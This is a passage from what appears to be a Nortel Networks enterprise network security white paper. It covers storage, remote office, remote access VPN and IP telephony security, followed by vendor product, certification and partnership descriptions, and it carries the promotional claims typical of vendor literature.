As SANs are extended globally, storage security becomes a significant concern. Within the data center, storage access is
protected within the SAN by creating zones of trust. As storage is extended on CWDM/DWDM optics, carrier-grade
connectivity and security is required (and provided by Nortel Networks solutions). Optical connectivity solutions are
inherently secure since the sniffing of an optical signal is not possible and the network elements do not operate in the
IP data plane. The optical storage data is a completely private and secure optical signal.

Within the network core, carrier-grade network elements are required that are “IP hacker-proof.” The management
plane of the optical network elements that are used by enterprises (and form the core of service provider and carrier
networks) for transporting storage, video, voice and data are secured through the application of techniques for securing
management described in this document. In contrast, using the enterprise IP for storage networking (such as with
iSCSI) opens up this critical enterprise resource to a broad range of vulnerabilities.

3.3 Securing the remote office


In this context, the term “remote office” refers to any remote workplace that requires persistent, two-way communication with
the enterprise—for locations as diverse as a telecommuter’s home office or a major regional office. Connecting remote offices
is a significant network cost in many industries, such as retail banking, health care, and government.

Traditionally, remote offices were connected to the enterprise network using various LAN technologies and multi-protocol
routers, working into frame relay networks with ISDN circuit-switched backup. VSAT satellite terminals have also been widely
deployed—for instance, for credit card validation in the retail industry. Four major developments are transforming the remote-
office networking scenario: (1) the convergence on Ethernet as the LAN standard, (2) universal acceptance of IP as the
protocol of choice, (3) the Internet, and (4) a growing list of Layer 2 and 3 VPN services. However, these developments also
introduce a variety of security challenges, particularly for “extended” and “open” enterprises.

WAN (wide area network) edge requirements at the branch office level include routing between VLANs locally and into the
network, QoS and bandwidth management, and scalable interfacing into the WAN. This includes supporting the required
encapsulation scheme over the WAN and whatever level of reliability is appropriate. Cost effective security over the Internet
(and even over frame relay) is a key requirement. Managing the transition from legacy (relatively secure) WAN technologies
to IP-VPNs is also a challenge. Some enterprises want to have direct Internet access from every remote office, opening up the
need for remote firewalls.

Others want highly reliable, dynamically routed connectivity between branches and the enterprise backbone, with centralized
firewalls into the Internet, in some cases using frame relay as the primary path and the Internet as a backup—or moving
towards IP-VPNs as a primary configuration. Dynamic routing enhances scalability and reliability by automatically learning
network topology and end-user addresses, and adapting to changes in network topology.

However, security in routed networks has been an afterthought. For example, there has been no effective way to run dynamic
routing over VPN-encrypted tunnels, which themselves have been difficult to manage.

These limitations have led enterprises to buy, install, maintain, and manage multiple security and networking devices for
remote office and branch networks, resulting in a complex and costly architecture.
31
Dynamic routing vulnerabilities
Although dynamic exchange of routing information among enterprise sites eases the administrative tasks of managing
network traffic flows and can enhance reliability, it can also introduce security issues if not configured and managed
properly.
One key issue is the handling of default routes, which determine where traffic with unknown destination addresses
will be sent. Typically, the default route points to the Internet. In this case, if routing information for some site in the
enterprise is lost (perhaps due to equipment failure, but possibly due to a security attack), then traffic meant for that
site may be sent into the Internet, without security protection. If the missing route is actually reachable through the
Internet (e.g., if it is advertised by an Internet gateway at the remote office), then full bi-directional communication
might be established, with traffic flowing unprotected across the Internet—all unknown to the systems involved in the
communication.
Another issue with dynamic routing is the problem of misleading routing information. If one routing system is
hijacked, or if a workstation in the network is configured to send false routing messages, an attacker could redirect
traffic to a point where it can be compromised. Likewise, a misconfigured router at a remote office can advertise incor-
rect routing information and disrupt communications, even if no malicious intent or traffic interception is involved.
An example is when one remote office routing system is configured with a static route for another site, then advertises
this route as if it were located at that site. This can disrupt traffic actually intended for the other site.
The solution for these routing issues is to ensure that gateway systems for remote offices contain effective route
filtering capabilities, so they will not simply blindly exchange any routing information they receive from the internal
network, but will apply intelligent rules to it. This strategy enables the enterprise network to benefit from the manage-
ability of dynamic routing without exposing the network to dynamic routing vulnerabilities. Clearly, routing informa-
tion received from the Internet should be carefully filtered, and internal enterprise routes should never be accepted
from the Internet.

With the move to IP-VPNs over the Internet, a complete set of security requirements have to be met as cost-effectively as
possible at multiple network levels:
• “Network security level” functions include IP routing over secure tunnels and VPNs
• “Network-assisted security level” functions include encryption and stateful firewall inspection
• “Application security level” functions must be provided if data servers and/or IP telephony are deployed at the remote office
• Access management provisions include remote-office authentication and directory services that enable users to have a unique
security profile that stays within them whether they log in locally over the intranet or from home across the Internet
• Network management security provisions must be extended to the remote office, without back doors that might
compromise network security

Traditional solutions for secure remote office connections


Traditional solutions have proven problematic for meeting remote office security requirements. Many enterprises
considered turning on the requisite security functionality on their routers, only to find that adding security may not be
possible on low-end routers, or it may impact router performance and require an expensive upgrade that may represent
up to 50 percent of the cost of the original router.
Even if a router can be upgraded to support filtering, firewalls, and VPNs, treating security as an application on top of
monolithic routing code introduces other problems. One example is in routing over IPsec tunnels, required to manage
redundant paths, route around failed nodes, and perform load balancing and on-the-fly route selection based on link
utilization. Today, these functions are done by double encapsulating IP packets via Generic Routing Encapsulation
(GRE) on top of IPsec tunnels, resulting in extra processing, memory, and transmission overheads—in fact, an addi-
tional 24 bytes per packet—and requiring manual configuration of each end user. GRE also presents recognized packet
fragmentation issues. If this is unacceptable to the customer, then the only practical option is manually configured
static routes, which are clearly labor intensive, provide ineffective load balancing at best and awkward for managing
changes.

32
Figure 12. Securing the remote office

Internet

Legacy branch Converged branch

Secure IP
Token, Services Gateway
Token, PKI
PKI
FW Auth SRT
Auth
IPsec IPsec FW
L2
Layer 2 switch
and IP telephony
system
RADIUS
PBX server
PSTN
RADIUS L2
server

IP telephones

A new architecture for securing the remote office


Adding security to routers (see “Traditional Solutions” sidebar) is a sub-optimal solution that doesn’t measure up to the
mission-critical service delivery requirements of branch networks. Multi-box solutions raise total cost of ownership, a problem
that multiplies with the hundreds or thousands of sites that may need to be served.

A new approach uses secure IP services gateways, which are purpose-built devices that deliver security and security-related IP
services in a single, integrated platform designed for remote offices. A single hardware device provides bandwidth management
over a range of WAN services, dynamic IP routing over encrypted tunnels, IP-VPN support, and a range of security features,
including stateful firewall inspection, encryption, and authentication—all operating under directory and policy services.
Targeted at the enterprise edge—the intersection of an enterprise’s private and public IP networks—secure IP services gateways
provide secure communications over an inherently insecure medium, the Internet.

The Nortel Networks Contivity Secure IP Services Gateway is a new class of device in this area, and a key component of our
Unified Security Architecture. Contivity Secure IP Services Gateways:

• Run over ISDN, frame relay, IP-VPN and emerging Layer 2 VPN services (such as Optical Ethernet)
• Deliver encryption/authentication/firewall performance at wire-speed
• Operate under a unified security policy management architecture that covers remote users and sites across the enterprise
• Support dynamic end-to-end routing for a mix of frame relay virtual circuits, Layer 2 Virtual Private Ethernets, and IPsec
tunnels—the latter achieved by making tunnels visible to the routing code and by encapsulating routing messages directly
in IPsec (bypassing the GRE layer of today’s solutions)
• Centralize provisioning of critical IP services with tightly integrated security
• Interoperate with existing routing, authentication/directory, and security services

33
Figure 13. Remote office dynamic routing for increased reliability and scalability

Redundant Secure IP Services Gateways at central site

FW IPsec SRT FW IPsec SRT

Remote Static and dynamic


access Internet routing over secure FR Frame Relay
clients or secure tunnels

FW IPsec SRT Auth FW IPsec SRT Auth

Branch Secure IP Services Gateways Branch Secure IP Services Gateways

Secure Routing Technology (SRT) features in Contivity systems


• Secure IP services applications decoupled from the hardware
• Software-configurable IP service deployment
• Designed for secure management, secure policy, secure access, and secure routing
• Compatible with existing Contivity VPN switches and Succession IP telephony
Policy Management
• Applied to frame relay, PPP connections, and secure tunnels
Secure Access Management
• Strong user authentication (PKI) services, and LDAP, RADIUS, digital certificates,
smart cards, and user name/password
Network Security
• Dynamic routing of IP packets over encrypted tunnels
• NAT, PPP over Ethernet, DHCP server and client, DNS with VPN, and DNS Proxy
Network-assisted Security
• Full stateful firewall with 100 application gateways
Management Security
• Remotely managed using strong encryption (IPsec)
• Secure base configuration, denying all Internet and providing DoS protection
• Logging and protection against hacker attacks

34
3.4 Securing remote access
Remote access enables “extended” and “open” enterprises to make efficient use of people and resources wherever they are
located—at home, on the road, using public PCs, or drop-in business centers in hotels. However, opening the network to
access from anywhere introduces security concerns.

One of the most prevalent security threats is a remarkably low-tech issue—theft of personal computers—that can lead to more
serious issues, i.e., using the stolen PC to steal locally stored data or to masquerade as a legitimate user to access the enterprise
network.

For that reason, sensitive information on systems used for remote access should be encrypted using a system that integrates
seamlessly into normal application use. Encryption systems are currently available that enable the user to operate normally,
not requiring manual or individual encryption/decryption of files. For example, entire file systems or “folders” can be stored
in encrypted form, with decryption being integrated in normal file system access.

Another threat occurs when the remote-access user is operating on an easily hacked wireless LAN, perhaps at home or in a
hotel. For wireless access, the user’s access device should be equipped with anti-virus software and an up-to-date personal
firewall that prevents unauthorized users from hacking into the user’s PC during an open communication session.

Figure 14. Securing the remote access

Home office
FW IPsec
Central site
VS IDS
Redundant Secure
IP Services Gateways
FW IPsec SRT Auth

Internet
SSL VPN Gateway Hotel
SSL Auth FW IPsec VS IDS

SSL

Airport
SSL
FW IPsec VS IDS

Customer site Payphone


with data jack

Securing dial-up access. Remote access over dial-up connections—such as ISDN switched access or a modem call over stan-
dard telephone lines—must be protected with stringent access authentication and authorization procedures. Encryption adds
another level of security for confidential communications, but this method is inherently insecure because it can be used to
circumvent firewalls and other IP-enabled security techniques. Direct switched access—widely used in the 1980s and early
1990s is rapidly being replaced by Internet-based remote access VPNs.

35
Remote access VPNs. Internet-based remote access provides tremendous flexibility and high bandwidth.
Two approaches are common:

• VPNs based on IPsec, with IPsec client software loaded on the user’s access device.
• SSL extranets based on SSL, that uses the SSL capability built into standard Web browsers and requires no other client
software. We chose not to use the term “VPN” when describing SSL implementations, since SSL only gives access to an
application, not the full network.

Let’s take a closer look at these popular VPN strategies.

IPsec-based VPNs
IPsec is a network-layer approach that can be used across applications. For example, an IPsec-based VPN connection can be
used to access e-mail, HR self-serve applications on the intranet, and browse the network. An IPsec “client” (the user-interface
software), such as Nortel Networks Contivity Multi-OS Client, must be installed on the access device—PC, PDA, handheld
computer, etc. The access device should also be loaded with anti-virus detection software.

Whether based on dial access to an ISP point of presence (POP) or on wired or wireless direct access, the VPN client authenti-
cates the user, verifies the integrity of the user’s computer system, and establishes a secure link (“ tunnel”) to the enterprise. The
VPN client ensures that the remote system is secure even during session setup, where exchange of authentication information is
encrypted.

Remote access VPNs must be able to detect and, if possible, bypass common Internet obstacles such as NAT and outbound
firewalls, such as when linking to the enterprise network from within another firewall-protected network. At minimum, the
VPN must tell the remote user the nature of obstacles encountered. An important feature of Nortel Networks Contivity client
is the support of split tunneling, with simultaneous secure access to the enterprise and clear access to the public Internet.

Remote access connections from the Internet are handled by an IPsec gateway system at the enterprise edge. Multiple gateways
with multiple paths to the Internet provide essential redundancy in case of the failure of any one path or device. Larger enter-
prises or those with critical confidentiality requirements should consider separation of gateways as well.

The effective IP services gateway should provide: simple client configuration; the ability to pass connections through to the
internal enterprise network as opposed to session termination; a stateful firewall functionality to preclude the need for a sepa-
rate firewall; support for multiple authentication methods such as RADIUS, PKI and LDAP, directory-based userID and pass-
word systems such as Microsoft Active Directory and Novell Directory Services; and smart card or token-card authentication
on users’ laptop. Support for L2TP and PPTP be beneficial.

SSL extranets
SSL is session-layer approach, which means that every application has to support SSL and have its own user authentication
approach. For example, when you go to Amazon.com, the SSL session is set up before you enter your userID or credit number.
User authentication could include going to an authentication server. Firewall traversal and NAT is easily supported with SSL.

SSL is built into standard Web browsers such as Microsoft Internet Explorer, so no special client software is required. This
feature makes SSL extranets particularly attractive for scenarios where the enterprise doesn’t own or control the remote access
devices, or where users need access from public PCs.

Web browsers are common targets of hackers, but the benefits outweigh the risks and can be mitigated by using personal fire-
walls and intrusion-detection systems on the access device. The application-agnostic SSL protocol is considered robust enough
that it is used extensively for consumer access to online shopping Web sites.

However, Web browsers support SSL only for Web-enabled (HTML) applications. As a result, if an enterprise wants to use
SSL extranets for access to, say, its legacy supply chain management application, then either the application has to have an

36
HTML/SSL front end or an external application-specific gateway. Several vendors offer external gateways for common applica-
tions, but every application will need to have a unique front-end acquired or developed. In addition to this trade-off, there are
also potential incompatibilities among browsers and browser versions. For example, some versions of SSL will actually allow a
fallback to very weak 40-bit encryption if 128-bit encryption is not present.

In conclusion:
• SSL extranets operate at the transport layer, are good for Web applications and extranets and limited application access,
and don’t require any special client software. However, SSL extranets open up a large security hole when used from uncon-
trolled PCs—such as public PCs in kiosks—which may lack personal firewalls and/or be infected.
• IPsec VPNs operate at the network layer, are application agnostic, and require a PC client. IPsec VPNs provide complete
control over the security environment.
Nortel Networks offers both types of VPNs. Contivity Secure IP Services Gateways lead the market in IPsec-based remote
access and remote office VPNs, with more than half a million VPN clients in service. Nortel Networks has recently extended
its Alteon portfolio to implement SSL extranets.

3.5. Securing IP telephony services

Enterprises are starting to roll-out IP telephony solutions to reap the benefits of convergence in the LAN and the WAN,
and of converged applications. Every VoIP system is a hardware/software solution that comprises four logical functions:

• IP telephones and PC soft clients


• Communications servers (also called call management servers or gatekeepers)
• Media gateways that provide flexible network access, for example, via traditional PBXs and the public switched telephone
network (PSTN) and the public wireless network
• Application servers for such purposes as unified messaging, conferencing, and collaborative applications enabled by
Session Initiation Protocol (SIP)
These functions and related application servers—such as contact center systems—are distributed across a telephony- or
business-grade IP network that delivers the required levels of reliability, voice quality, and congestion management.
Extended reach and mobility are provided over wireless LANs and over the Internet via IP-VPNs.

IP telephony is very time-sensitive and critical to the business, and just like other data applications, subject to a variety
of attacks. For example:

• Attacks on the router can bring down both voice and data services
• Denial of Service can overload an IP telephony communications server or client
• Ping of Death can disrupt VoIP operations by sending multiple pings to VoIP devices
• Port scanning can find vulnerabilities in VoIP clients and servers
• Packet sniffing can record and/or intercept conversations
• IP spoofing can misrepresent the source or destination of the media or signaling stream
• Viruses, worms, Trojan horses, and time-triggered bombs can attack servers and clients

There have already been cases of hackers taking over IP clients—due to lack of administration passwords in one case (i.e.
PingTel), and due to vulnerabilities associated with running XML in another (Cisco). However, while these could be very
disruptive, they are primarily a threat when running VoIP natively across the Internet and a relatively lesser threat when run
within the enterprise or over tunneled Internet connections. We are a few years away from seeing VoIP used end-to-end
between employees and the outside world; the security architecture for VoIP will be extended when standards, public services,
and interoperability have reached greater maturity.

37
Toll fraud prevention
“Toll fraud” theft of service occurs when a PBX and its communications facilities are accessed and used illegally by
unauthorized users—internal or external. Just like a computer hacker, PBX hackers look for weak spots in the PBX
and use an array of complex hacking tools ranging from password-stealing software to automatic dialers. Often,
hackers are difficult to detect until the damage is already done. With so many different internal and vendor or system
integrator technicians accessing the PBX as part of routine maintenance, PBX hackers are often discovered only after
they’ve had days or even weeks to access facilities and rack up hundreds or thousands of dollars on the enterprise
phone bill.

This complex problem requires sophisticated countermeasures, even in a world where the cost of an individual phone
call is measured in pennies. IP telephony solutions must offer toll fraud prevention and other features that work with
both VoIP and traditional telephony.

PBXs—such as Nortel Networks Meridian 1 and state-of-the-art IP telephony systems such as Nortel Networks
Succession CSE 1000—support toll-fraud prevention mechanisms. These mechanisms are founded on Telephony
Class of Service, which defines on each user’s accessibility to making state, national, and international long distance
calls. The user can be denied all access, or allowed to make certain types of on-net/internal and off-net/external long
distance calls. The default for new phones is restricted calling. These rules can be applied on a time-of-day basis and be
overridden with an authorization code. Indirect access to long-distance calling is also controlled, including potential
access via speed call lists, call forwarding, voicemail call answering through dial, and DISA access for employees dialing
into the enterprise network remotely.

Figure 15. Securing IP telephony IP


Telephony
Multimedia
Application
Management VLAN
L2

Unified
Messaging
Contact
Center
Server Server Server
IP-enabled
PBX
IDS IDS IDS IDS

VS VS VS VS

Telephony-grade IP Network
SRT NAT FW IDS IPsec AL Auth

1 2 3 IPsec
FW IPsec 4
7
5
8
6
9
* 0 #
* 0 #
#
FW IPsec
VS IDS Digital PC IP sets
802.11 VS IDS SIP enabled

Management VLAN
L2

IP Multimedia Unified Contact


Telephony Application Messaging Center
Server Server Server
IP-enabled
PBX
IDS IDS IDS IDS

VS VS VS VS

Telephony-grade IP network
SRT NAT FW IDS IPsec AL Auth

1 2 3 IPsec
FW IPsec 4
7
5
8
6
9
* 0 #
* 0 #
#
FW IPsec
VS IDS Digital PC IP sets
802.11 VS IDS SIP enabled

38
Securing IP telephony requires a coordinated approach across all aspects of the Unified Security Architecture. Policy manage-
ment and secure access management authenticate users and authorize the use of features and calling capabilities. Management
security secures management of VoIP devices such as communications servers and media gateways.

Security mechanisms that have been implemented for IP data can be extended to cover IP telephony—for example, using
IPsec and IP-VPNs for secure remote access and branch connectivity for VoIP and data, and for wireless LAN access. Stateful
inspection firewalls and network address translation can be applied to VoIP services. Policies governing data and VoIP should
be integrated under policy management. Application-level security is provided through such methods as OS hardening,
PC-based virus protection, and personal firewalls.

Securing IP telephony at the “application security level”


Securing application and IP telephony communications servers. The heart of the IP telephony system is the communica-
tions server—which can be a standalone server, such as the Nortel Networks Succession CSE 1000/2000 server, or integrated
with other components, such as Nortel Networks IP-enabled Meridian system and Business Communications Manager.
Equally important are application servers delivering contact center services (such as Nortel Networks Symposium), multimedia
applications (such as Nortel Networks CSE Multimedia Xchange), unified messaging (such as Nortel Networks CallPilot),
and self-serve interactive voice response systems. Securing these servers starts with hardening of the operating systems.

Securing VoIP clients. VoIP solutions support a broad range of clients and access configurations, including IP wired and
wireless telephones (e.g. Nortel Networks i2002 and i2004, and Symbol’s wireless LAN IP phone) and PC-based soft clients
(e.g. Nortel Networks i2050 and SIP clients). When connected to an IP network, these clients are vulnerable to attack.

There are a number of different telephony signaling protocols such as SIP, H.323, UniStim used by Nortel Networks IP
telephones, and Meridian Customer Defined Networking for network-wide feature operation. In the future, the ability to
secure signaling traffic at the VoIP client will be generally available. In IP telephony systems, the voice signal is packetized
using a standard such as G.729 (at 8 kbps) and a speech activity detection algorithm, and uses the Real-Time Protocol (RTP)
protocol with UDP at the transport level. Encryption of the voice at source will emerge as an option, as required by special
sectors such as the military community.

The process is different for securing IP telephones and PC-based soft telephony clients:

• IP telephones, such as Nortel Networks i2004/2002, are custom-built appliances for telephony only. There is no storage
or asset on the phone itself to protect other than its presence on the network as a trusted device. The identification of the
caller and the call itself are the only assets to be protected. These telephony appliances most commonly use a proprietary
thin client protocol that relies on the communications server for feature/functionality and security. Approaches that rely
on XML in the VoIP set for feature operation are open to greater vulnerability.
• VoIP soft-clients on users’ PCs co-exist with other applications and assets, and run widely available operating systems. That
means a successful attack can be damaging to several valued assets, and these devices should be protected with personal
firewalls, anti-virus detection, and IP-VPN clients—the same mechanisms used for data security on that access device.

Securing IP telephony at the “network security level”


Securing VoIP in the wiring closet and across the campus. IP devices are wired into a campus network using either shared
media or, more commonly, dedicated switched Ethernet connections. Wireless LANs are being widely adopted, especially in
education and healthcare environments.

VoIP soft clients and dedicated VoIP appliances should be connected to switched Ethernet environments right to the desktop,
for the following reasons:

• VoIP latency variation is minimized by eliminating CSMA/CD operation of shared media Ethernet operation
• Other devices are prohibited from eavesdropping on VoIP calls
Enterprises may also chose to logically group VoIP telephones in their own VLANs to enhance security and manageability.
39
Special considerations apply when using wireless LANs (WLANs) to extend IP telephony services within the enterprise; for
example, from the desktop to conference rooms, classrooms, or shop floor personnel. Because wireless LANs are relatively inse-
cure, both the signaling and voice planes need added security over the wireless segment of the call path. One method is to
configure soft clients co-resident with an IP-VPN client on the access device. Alternatively, some WLAN IP phones have built-
in encryption and authentication. Nortel Networks has a strategic partnership with Symbol, whose WLAN IP phones support
128-bit WEP encryption between the client and the wireless access point, plus Kerberos authentication.

Securing branches for IP telephony. Several approaches are available for securing remote office VoIP solutions. For example,
an enterprise could:

• Support VoIP telephones and soft clients from an “office-in-a-box” system that integrates IP telephony capabilities and
VPN security, such as Nortel Networks Business Communications Manager with integrated Contivity IP-VPN client.
• Leverage the distributed nature of VoIP by deploying clients off a centralized server such as a Nortel Networks IP-enabled
Meridian platform, CSE 1000 server, and CSE MX server, and running this traffic over an IP-VPN.
• Support a Nortel Networks Remote Office 9150 VoIP telephone off a central site IP-enabled Meridian PBX, which
supports Meridian digital telephones over an IP-VPN infrastructure while supporting a fully featured back-up path by
tunneling over the PSTN. This approach is unique to Nortel Networks.
Nortel Networks Contivity IP-VPN solution is unique for its Secure Routing Technology, which minimizes latency for VoIP
calls through meshed connectivity of secure tunnels over the Internet. This same solution can provide security for voice and
data traffic traversing frame relay networks.

Figure 16. Securing remote networking for IP telephony

Remote office

IDS IP telephony IP sets


soft client
VS

IDS

VS
802.11
1 2 3

FW IPsec 4
7
5
8
6
9

SIP soft client Secure IP


*
*
0
0
#
#
#

Services Gateway SRT


SIP soft client
IP telephony soft client
Central site
Secure IP Services Gateways
Internet Hotel

FW IPsec SRT Auth


FW IPsec VS IDS

SIP data
soft client
SSL

Airport
SSL
FW IPsec VS IDS

Customer site Payphone


with data jack

40
Securing remote access for IP telephony. At home, in a hotel, or on the road, remote users can benefit from the convenience,
control, and productivity of IP telephony. To secure this kind of telephony access, VoIP soft clients would be co-resident with
an IP-VPN client on a laptop—and ultimately on a suitably equipped PDA—for mobile employees. This same configuration
is used to take advantage of WLAN access points in hotels, airports, and convention centers. VoIP telephones for telecom-
muters and remote contact center agents could be secured with a home office IP-VPN, such as a Contivity 1000 Secure IP
Services Gateway.

Network management security for IP telephony. Management of IP telephony services should be protected with the same
level of network management security accorded to the network and security infrastructure in general.

A physically dedicated Ethernet port should be configured for VoIP management functions—part of a management VLAN
that blocks all non-management traffic at the routing level via access lists and perimeter security, and has all unused ports
turned off. Only authorized application software should be run on the servers in this VLAN. Multi-level security should be
applied with various levels of privileges (monitor, configure, control) for authenticated operational personnel. User passwords
must be securely stored and password formatting and change management strictly controlled. Management traffic (such as
billing information) can be optionally encrypted, even for internal transmission through IP-VPN technology. Off-net access for
suppliers, system integrators, and/or VARs can be provided via IP-VPNs.

Securing Web-enabled contact centers for IP telephony


Web-enabled contact centers are a key platform for offering “engaged” customer services that seamlessly integrate Web
and telephony interfaces with the organization. Using IP telephony in contact centers makes it cost-effective to widely
distribute agents, without compromising features and functionality.

However, because of the inherent security exposures of the Web interface and the critical nature of telephony services,
special security considerations apply. Securing servers at the application and OS levels is based on hardened OS archi-
tectures and off-the-shelf security packages. Securing server management is based on partitioned operations using
VLAN and remote access via IP-VPNs. IP-VPNs are also used to secure remote VoIP agents operating over the
public network.

41
Part IV. Nortel Networks technology and expertise
Nortel Networks has defined a new strategy for the enterprise network, known as One Network. A World of Choice.
One Network because it supports infrastructure convergence and eliminates boundaries. A World of Choice because
it delivers options on how enterprises build the optimal networks to suit their needs. The vision is of a single, converged
network that answers the critical business realities that strain and constrain today’s networks.

Absolutely central to this vision is the principle that security is inherent in all applications and services—intrinsic to the very
DNA of the network. The Unified Security Architecture outlined in this document represents the Nortel Networks blueprint
for that new enterprise network.

Within this One Network. A World of Choice. strategy, security provisions are in place to:

• Make enterprise networking products secure from a management perspective.


• Address network and voice/multimedia application security needs.
• Evolve from a perimeter-based security model towards a distributed and layered network security architecture with central-
ized administration.
• Deliver reliable high-performance security solutions, including VoIP and wireless.
• Provide choices to enterprises in meeting their security requirements, driven by their business needs.
• Leverage industry-leading technologies and solutions across enterprise and service provider markets.

4.1. Design tenets built into the Nortel Networks security portfolio
Nortel Networks enterprise networking products—including security products and solutions—have been designed and built to
adhere to the following tenets:

Security in the DNA means Nortel Networks security products—such as Alteon Switched Firewall, Alteon SSL Accelerator,
and Contivity Secure IP Service Gateways—are designed from the ground up with security in mind.

Failsafe business continuity relies on network resilience from the physical layer to the application layer for mission-critical
applications and data, using ‘session persistence,’ load balancing, acceleration methods, and optical technologies. For example,
the Alteon Security Cluster provides a comprehensive security framework that delivers multi-gigabit acceleration and integrates
firewalls, SSL offload, intrusion-detection, and anti-virus protection into a scalable, easy-to-manage architecture.

Scalability by design extends and protects network investments and lowers operational costs. The Alteon Switched Firewall,
delivering the highest capacity in the industry at 3 Gbps, demonstrates this tenet in practice.

Application-optimized network components such as the Alteon SSL Accelerator combine “network-assisted” security with
network intelligence to add a layer of security across multiple applications while optimizing server performance.

Communications convergence ensures that IP telephony and multimedia applications such as Nortel Networks Succession
products can securely operate within both the enterprise environment and across the Internet.

Engaged applications deliver timely, context-sensitive, user-aware content to users as quickly, efficiently, and securely as
possible across multiple service delivery channels.

Comprehensive management ensures that security policies are effectively and consistently implemented throughout the
network. For example, Optivity Policy Services complements other Optivity management solutions to secure the management
system and enhance survivability.

42
Figure 17. Design tenets behind Nortel Networks products

Security in the DNA

Scalability by design

Fail-safe business continuity

Communications convergence

Comprehensive management

Application-optimized network

Engaged applications

These design tenets apply to the entire Nortel Networks portfolio, including for example:
• Alteon switches that provide firewall/IDS/IP-VPN load balancing and content filtering
• Passport 8600 routing switches that provide extensive filtering and access list controls, as well as firewall/IDS/IP-VPN
load balancing when equipped with an Alteon Web Switching Module. The Passport 8600 is a 256 Gbps platform so
robust that it is used in service provider central offices
• Ethernet hubs and switches from the BayStack portfolio that support VLANs and user authentication via EAP

Security is also a key element of Nortel Networks applications for IP telephony and multimedia, contact centers, unified
messaging, and more. Integration with solutions from our business partners delivers important capabilities such as intrusion-
detection, anti-virus, content filtering, and authentication. Whether offered as intrinsic features in multi-purpose products—
or purpose-built security devices—Nortel Networks security solutions protect the network and applications with high
performance and low cost of ownership.

4.2. Expanded choice through partnerships

Nortel Networks partners with service providers to enable them to offer best-in-class secure managed service solutions.
For example, our Contivity systems have been deployed by the majority of the world’s leading service providers for their
managed IP-VPN services. Nortel Networks Shasta Broadband Service Node (which uses the same VPN client as Contivity)
is the foundation for many providers’ network-based IP services—including VPNs, firewalls, and other security services.

Nortel Networks also partners with best-of-breed security application vendors for two types of collaboration:
• Working with select security application vendors to achieve full code integration with the Alteon Open Security
Architecture for the purposes of accelerating existing security technologies.
• Ensuring seamless interoperability with third-party security methods for authentication (RADIUS, digital certificate/PKI,
hardware/software tokens, and smart card), intrusion-detection, anti-virus, content filtering, firewall reporting, and more.

43
4.3. Security services

With new data privacy legislation pending and enacted, a constantly changing scene of network threats and vulnerabilities,
and IT security teams operating on limited budgets and manpower, many enterprises turn some or all of their security
functions to certified security specialists. Security consulting services can help the enterprise move forward with confidence to:

• Achieve and maintain compliance with Gramm-Leach-Bliley, HIPAA, and other legislation.
• Obtain objective third-party validation of their security implementation, policy, and practices.
• Establish security baseline information from thorough vulnerability analysis of the network, overall site surveys of wireless
nodes added to the wired network, and other security services.

Organizations in the health care, financial, and insurance industries would be particularly interested in any or all of the
following services related to recent Federal legislation:

• Assessing and analyzing the current network and environment for compliance with new industry regulations
• Developing plans to address noncompliant areas
• Implementing policies, procedures, processes, and the technology to meet the new standards
• Certifying that the enterprise organization complies with regulations and legislation
• Monitoring to assure continued compliance

Nortel Networks partners with security services vendors (e.g. Olympus Security Group) with CISSP-certified personnel
to provide security deployment assistance, security training, security assessments, and regular security audits to ensure new
products and/or practices have not defeated security policies.

4.4. Nortel Networks product assurance


Nortel Networks product assurance initiatives ensure that security functions perform to industry-accepted standards and
specifications, where they exist.

Firewalls. Nortel Networks firewalls are or are being certified by the International Computer Security Association (ICSA),
an internationally recognized, independent organization that enforces strict standards of certification for security products.

Encryption. Nortel Networks Contivity and Alteon SSL Accelerator products have achieved compliance with U.S. Federal
Information Processing Standard (FIPS) 140. To earn this status, cryptographic modules are tested by accredited laboratories
and assigned a rating from 1 to 4 (lowest to highest) in 11 key design and implementation areas. The overall testing program is
overseen by the U.S. National Institute of Standards and Technology (NIST) and the Communications Security Establishment
(CSE) of the Government of Canada.

Common Criteria international certification. Responding to the newly established and globally accepted “Common Criteria”
evaluation program, Nortel Networks has begun work to obtain this certification for key products, first for Alteon Switched
Firewall and Contivity Secure IP Services Gateways.

44
A closer look at Common Criteria
An international effort to develop international IT security criteria, the Common Criteria initiative is designed as a
taxonomy of security requirements specified either as “Protection Profiles” or as a “Security Target.”

“Protection Profiles” are customer- or community of interest-generated sets of security requirements that are made
publicly available before, during, or after certification as reusable by any organization or group with similar needs.
These profiles can be established as standards for a particular application area such as electronic commerce, a govern-
ment-authored list of requirements for a particular type of product such as a firewall, a particular market place vertical
such as healthcare, or a customer’s own list of requirements.

“Security Targets” are the security objectives of a specific product or system, known as the Target of Evaluation (TOE).
The Target can conform to one or more Protection Profiles as part of its evaluation.

The document—International Common Criteria for Information Technology Security Evaluation—specifies security
functionality and evaluation methods, based on: the original United States government Orange Book or Trusted
Computer System Evaluation Criteria (TCSEC), Canada’s Trusted Computer Product Evaluation Criteria (CTCPEC),
and Europe’s Information Technology Security Evaluation Criteria (ITSEC) (which combines work from the
Netherlands, French criteria, German criteria, and UK Confidence Levels) security criteria.

To date, the Common Criteria have been formally recognized by 23 countries. Common Criteria (CC) v2.1 was
released in 1998 and has been adopted by the International Organization for Standardization (ISO) as standard
15408. For more information, see the Nortel Networks Common Criteria datasheet.

4.5. Nortel Networks and cross-industry security developments

Nortel Networks participates actively in ongoing security standards development within the Internet Engineering Task Force
(IETF), the International Telecommunications Union (ITU), the European Telecommunications Standards Institute (ETSI),
for IPsec, NAT, PKI, SYSLOG, etc., as well as the following international private and public sector organizations, which work
to find solutions for the growing number of security vulnerabilities on a worldwide basis:

• Internet Security Alliance. Nortel Networks is a founding sponsor of this organization, created to share information and
lead thought on information security issues. It is a collaborative effort between the Carnegie Mellon University Software
Engineering Institute (SEI)*, the Carnegie Mellon CERT® Coordination Center (CERT/CC), and the Electronic
Industries Alliance (EIA), a federation of trade associations. The Internet Security Alliance represents industrys’ interest
before legislators and regulators, and creates a collaborative environment to identify and standardize best practices and
solutions.
• National Reliability and Interoperability Council (NRIC). Part of the Homeland Security Working Group, the NRIC
works to ensure the optimal reliability, interoperability, accessibility, and interconnectivity of public telecommunications
networks.
• The Telecommunications—Information Sharing and Analysis Center (Telecom-ISAC). Nortel Networks cooperates
with this subgroup of the National Coordinating Center for Telecommunications (NCC), which facilitates voluntary
collaboration and information sharing among government and industry ISAC members. The NCC gathers information on
threats, outages, intrusions, and anomalies; analyzes and sanitizes the information; disseminates the information in accord
with sharing agreements; and alerts others in “near real time.”
• National Security Telecom Advisory Committee (NSTAC). Nortel Networks participates in the Network Security
Information Exchange (NSIE) subcommittee of this group, driving the establishment of a common security baseline for
